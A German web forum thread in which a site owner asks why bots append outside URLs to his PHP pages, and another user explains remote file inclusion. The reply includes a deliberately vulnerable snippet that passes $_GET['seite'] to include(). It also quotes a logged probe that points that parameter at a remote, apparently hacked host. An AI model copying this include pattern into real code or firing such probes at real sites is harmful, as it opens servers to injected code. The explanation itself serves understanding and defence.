Hallo,
vor einiger Zeit hatte ich etwas sonderbare Einträge im
Server-Log, und heute waren wieder welche drin:
Irgendein Bot ruft gezielt Seiten (HMTL und PHP) meiner
Webseite auf und hängt als Parameter irgendwelche
Webseitenadressen ran.
Jop, das habe ich damals auch mit Entrüsten und etwas Wut feststellen müssen. Heute waren 2 so Bots wieder drin:
/schaltungen.php?seite=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F&id=18
ach übrigens die angehängte Adresse, muss nicht unbedingt dem Angreifer seine URL sein, es handelt sich viel öfter um eine gehackte Seite (glaube ich).
Meine Frage: Was soll das? Hofft man, auf ein so schwaches
Script zu stoßen, das die angegebene Adresse in eine
interaktive Linkliste oder in einen Forum-Thread aufnimmt?
Was du jetzt meinst, kann ich leider nicht ganz verstehen, dennoch kann ich deine Frage beantworten. Zumindest was ich weiss:
Schwaches Skript = Ja!
und zwar wenn anfänger php programmieren, dann denken die (ich auch damals) man kann einfach per include(); eine beliebige Seite laden.
Wenn du in deinem Script sagst www.blabla.de/scripte.php?seite=javascript.html
sprich If($_GET[„seite“]==$_GET[„seite“])
{
include($_GET[„seite“]);
}
einfachstes Beispiel
Und schwup schon kann man fremde Scripte einschleusen, wenn das ganze dann noch per Root gemacht wurde und nicht ein Extrabenutzer für die HP erstellt wurde (unter Linux), hat der Angreifer praktisch einen neuen Server.
Bestes Beispiel: ich hab beim googlen mal auf eine Seite geklickt und zuerst wurde die auch ganz normal angezeigt, nach ein paar sekunden wurde ich aber auf eine Werbe-Porno-Seite umgeleitet…
Oder zielt man auf Log-Leser ab? Das wäre ja noch bekloppter.
das glaube ich nicht…
Was mich vor allem wundert ist, dass die zugehörigen
IP-Adressen sowohl zu deutschen/europäischen, als auch zu
US-Providern gehören. Technisch wundert mich das nicht, nur
„inhaltlich“, wenn man da von Inhalt sprechen kann.
Ja überall gibts schlechte Menschen
Ich finds halt nur schade, dass Leute die etwas drauf haben, nötig haben kleine Leuts anzugreifen.
Vielleicht weiß ja jemand was über solche Machenschaften. Wäre
da mal neugierig.
Was du nicht weisst ist noch viel schlimmer: Ich hab davon gehört und selber nur ein paar mal in den logs gesehen (die guck ich nicht so oft an), andere viel bösere Angreifer probieren es gleich auf deinen Server mit root einzulogen oder machen brutforce auf deine www.seite.de/phpmyadmin und das ist um einiges schlimmer…
Übrigens schau dir an was ich mit den Angreifern erster Wahl (die mit Seite anhängen) mache.
Versuch mal an meine PHP-Dateien eine Internet-Adresse einzubinden, du wirst dich wundern 
Danke und schönes Wochenende,
Kristian
Soviel zur meiner Version (es muss nicht alles stimmen)
Gruss
Paul